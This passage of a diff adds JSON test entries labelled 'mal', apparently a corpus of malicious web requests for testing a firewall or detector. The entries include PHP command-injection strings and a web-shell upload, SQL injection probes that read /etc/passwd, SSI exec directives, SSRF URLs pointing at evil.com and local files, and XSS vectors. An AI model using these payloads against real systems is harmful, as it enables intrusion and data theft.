+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "base64_decode%28"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "foo=get_defined_functions%28%29%5B0%5D"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%28string%29%22system%22%28%27uname%27%29%3B"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "$_%53%20ERVER['REQUEST_URI'];"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "$_%53ERVER['test'];"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%3C%3Fxml%3Aecho%201%3B"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "unserialize(foo)"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "%24__%5B_%5D%2824%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "cmd=('system')('whoami')"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "----------397236876\nContent-Disposition: form-data; name=\"fileRap\"; filename=\"photo. php\"\nContent-Type: text/plain\n\nplease block me\n----------397236876--"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "cmd=(\"system  \")(\"whoami\")"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "posix_getegid%28%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "file_ExistS%20%28%0A%0A%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "base64_decode("
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "pfsockopen%28%27foo%27%2C%2025%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "checkdate%2f%2ax%2a%2f%28%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "phpinfo(foo)"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "foo=%24__%5B%40%24c%5D%288%29"
+ },
+ {
+  "category": "php",
+  "kind": "mal",
+  "payload": "name=%3C%3Fphp%20move_uploaded_file%28%24_FILES%5B%27f%27%5D%5B%27tmp_name%27%5D%2C%20%27%2Fvar%2Fwww%2Fshell.php%27%29%3B%20%3F%3E"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "SELECT load_file("
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "%27%3bprint%27"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "xor%0b3%3C"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "pay%3D%26%26%28a%3D%22"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "' or ''&'"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "ORDER BY 9--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "'%7B%22a%22:2,%22c%22:%5B4,5,%7B%22f%22:7%7D%5D%7D'%20%3E%20'$.c%5B2%5D.f'%20=%207"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "test%27%20%20%20%20or%20%20%20123%3C"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "exec+master.%0A"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "var%3d%20@.%3d%20%28%20SELECT"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "xor%20%27b%27%20%3E"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "sELecT%20slEep%20%283%20%2A%202%29"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "'=\"or'"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "password/?("
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "pay=uNhEx%28"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "pay%3Dand+1%21%3D%22"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "'&&SLEEP(5)&&'1"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": ") waitfor delay '0:0:20' --"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "COUNT("
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "pay%3D%26%26%28null%3D%3D%28"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "var=foo') UNION ALL select NULL --"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "ORder by"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "1)) or sleep(5)#"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "UNION ALL SELECT 'INJ'||'ECT'||'XXX'#"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "1'||(select extractvalue(xmltype('<?xml version=\"1.1\" encoding=\"UTF-8\"?><!DOCTYPE root [ <!ENTITY % toyop SYSTEM \"https://coreruleset.org/\">%toyop;"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "email=admin%40juice-sh.op';"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "select+1+FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28user%28%0A"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "pay=from+information_schema.tables+where+1%3D2+limit"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "ORDER BY 3"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "ORDER BY 4"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "email=admin%40juice-sh.op\";"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "convert("
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "var=test')and (select*from(select(sleep(10)))d)--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "')))))) waitfor delay '0:0:20' /*"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "in (2147483647,-1)"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "ORDER BY 1#"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "1\\"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "UNION ALL SELECT 1,2,3,4,5#"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "1'"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "')))) and 0=benchmark(3000000,MD5(1))%20--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "ORDER BY 17"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "1%20is%20not%202"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "var=1(select*from(select(sleep(5)))d)"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "current_user%28%0A"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": ";  As  not  from"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "\"))) and 0=benchmark(3000000,MD5(1))%20%23"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "UNION ALL SELECT 1,2,3,4,5,6,7"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "pay%3D%3Bdrop"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "pay%3Dor+1%3D%27"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "')) waitfor delay '0:0:20' --"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "OR x=y"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "select current_setting('krb_server_keyfile');"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "') and 0=benchmark(3000000,MD5(1))%20%23"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "\")) and 0=benchmark(3000000,MD5(1))%20--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "pay=%3C%3D"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "pay=and code != \""
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "pay='1001'='10"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "select session_user;"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "') or '1'='1'/*"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "pay=sin ("
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "test=SELECT/*avoid-spaces*/password/**/FROM/**/Members"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "execute php"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "and (select substring(@@version,1,1))='X'"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "ORDER BY 1,SLEEP(5)#"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "ORDER BY 22"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "pay=left%27%29%3F%24%28"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "') or '1'='1'#"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "execute system"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "admin' or '1'='1'#"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "pay%3D%40example.com%26name%3D%28select"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "UNION ALL SELECT USER()--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "pay%3D%3BSET+%40OLD_UNIQUE_CHECKS"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "email=%27%20is%20not%3F--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "function(foo)::bigint"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "pay= in ( Aa,- Ab-, and Ac)"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": ";RePLAcE%2F%2Atest%2A%2Ftest%2F%2Atest%2A%2F%28id%2C%20name%29%20VALUES%20%281%2C%20%27test%27%29%3B"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "pay%3D%3BSET+%40OLD_SQL_MODE"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "selectect%2520user%28%0A"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "admin\") or (\"1\"=\"1\"--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "REPLACE("
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "select current_setting('config_file');"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "OR 1=0--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "! As' from"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "' AnD SLEEP(5) ANd '1"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "select current_setting('virtual_host');"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "admin' or '1'='1'--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "chr("
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "AND 1=1 AND '%'='"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "pay%3D%3BSET+%40OLD_FOREIGN_KEY_CHECKS"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "')) waitfor delay '0:0:20' /*"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "lo_import(%27/etc%27%20||%20%27/pass%27%20||%20%27wd%27)"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "UNION SELECT @@VERSION,SLEEP(5),\"'3"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "pay%3D%2F3+or+"
+ },
+ {
+  "category": "sqli",
+  "kind": "mal",
+  "payload": "\" or \"a\"=\"a"
+ },
+ {
+  "category": "ssi",
+  "kind": "mal",
+  "payload": "<pre><!--#exec cmd=\"ls\" --></pre>"
+ },
+ {
+  "category": "ssi",
+  "kind": "mal",
+  "payload": "<esi:include src=\"http://host/poc.xml\" dca=\"xslt\" stylesheet=\"http://google.com/poc.xsl\" />"
+ },
+ {
+  "category": "ssi",
+  "kind": "mal",
+  "payload": "</nowiki>"
+ },
+ {
+  "category": "ssi",
+  "kind": "mal",
+  "payload": "<pre><!--#exec cmd=\"dir\" --></pre>"
+ },
+ {
+  "category": "ssi",
+  "kind": "mal",
+  "payload": "<pre><!--#echo var=\"DATE_LOCAL\" --> </pre>"
+ },
+ {
+  "category": "ssi",
+  "kind": "mal",
+  "payload": "<esi:debug/>"
+ },
+ {
+  "category": "ssi",
+  "kind": "mal",
+  "payload": "x=<esi:assign name=\"var1\" value=\"'cript'\"/><s<esi:vars name=\"$(var1)\"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name=\"$(var1)\"/>>"
+ },
+ {
+  "category": "ssi",
+  "kind": "mal",
+  "payload": "<pre><!--#exec cmd=\"whoami\"--></pre>"
+ },
+ {
+  "category": "ssi",
+  "kind": "mal",
+  "payload": "<esi:include src=\"http://google.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/\"/>"
+ },
+ {
+  "category": "ssi",
+  "kind": "mal",
+  "payload": "<esi:include src=http://google.com/>"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "https://[2001:41d0:701:1100::29c8]/gecko.php"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "file?"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "http://66.240.183.75/crash.php"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "local_file://something"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "url:file://etc/services"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "ftps?"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "https://2001:41d0:701:1100::29c8/gecko.php"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "ftp?"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "jar:http://evil.co/b.zip!a"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "gopher://google.com/_SSRFTest!"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "jar:file:/path/to/myApp.jar!/com/example/data.txt"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "ftps://foo.bar"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "http://example.com%2f@evil.com/"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "file://foo.bar"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "http://example.com%2f:asd@evil.com/"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "ftp://foo.bar"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "http://example.com%2f:foo@bar@evil.com/"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "ldap://127.0.0.1/"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "url:file://foo.bar"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "https://foo.bar?"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "http?"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\" encoding=\"UTF-8\"?><catalog><tag>ftp%3A%2F%2F1.1.1.1</tag></catalog>"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "https?"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "url:file:///etc/passwd"
+ },
+ {
+  "category": "ssrf",
+  "kind": "mal",
+  "payload": "https://example.com:1234/"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<BODY onload!#$%%&()*~+-_.,:;?@[/|\\]^`=javascript:alert(8411)>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "var=<acp xmlns:xi=\"http://www.w3.org/2001/XInclude\"><xi:include href=\"http://sgc5rj96zows5963jrrx3544qvwtnubvzomfa4.examplefoo.bar/foo\"/></acp>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "?clickTAG=javascript:alert(1)&TargetAS=\","
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<script src=\"http://code.jquery.com/jquery-1.4.4.js\"></script>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<video/poster/onerror=alert(1)>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "+ADw-p+AD4-Welcome to UTF-7!+ADw-+AC8-p+AD4-"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "\"'`>ABC<div style=\"font-family:'foo'\\x3Bx:expression(javascript:alert(6966);/*';\">DEF"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "&#x00003c"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<menu id=x contextmenu=x onshow=alert(1)>right click me!"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "\" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<img/src=@&#32;&#13; onerror = prompt('&#49&#49&#49&#49;')"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "payload=<applet onreadystatechange=alert(1)></applet></a>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<// style=x:expression\\28javascript:alert(1)\\29>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "&#60"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "\"'`><\\x3Cimg src=xxx:x onerror=javascript:alert(1)>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<svg onResize svg onResize=\"javascript:javascript:alert(1)\"></svg onResize>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<div id=\"132\"><!doctype html>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "onReadyStateChange"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<a href=\"\\x03javascript:javascript:alert(4212)\" id=\"fuzzelement1\">test</a>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<a href=\"javas\\x09cript:javascript:alert(2104)\" id=\"fuzzelement1\">test</a>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<IMG SRC=\" &#14;  javascript:alert(9113);\">"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<img alt='%></xmp><img src=xx:x onerror=alert(134)//'>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "onload=alert(1)>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(8231)\" id=\"fuzzelement1\">test</a>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<body onBeforeUnload body onBeforeUnload=\"javascript:javascript:alert(1781)\"></body onBeforeUnload>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<div id=\"135\"><?xml-stylesheet type=\"text/xsl\" href=\"#\" ?>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<BR SIZE=\"&{javascript:alert(1)}\">"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<img src\\x32=x onerror=\"javascript:alert(2514)\">"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<X onxxx=1"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "top[/al/.source+/ert/.source](1)"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<form><iframe &#09;&#10;&#11; src=\"javascript&#58;alert(8045)\"&#11;&#10;&#09;;>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "`\"'><img src=xxx:x onerror\\x0A=javascript:alert(2357)>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<li style=list-style:url() onerror=javascript:alert(3719)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(3719)></div>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
+  "payload": "<script>window['alert'](document['domain'])<script>"
+ },
+ {
+  "category": "xss",
+  "kind": "mal",
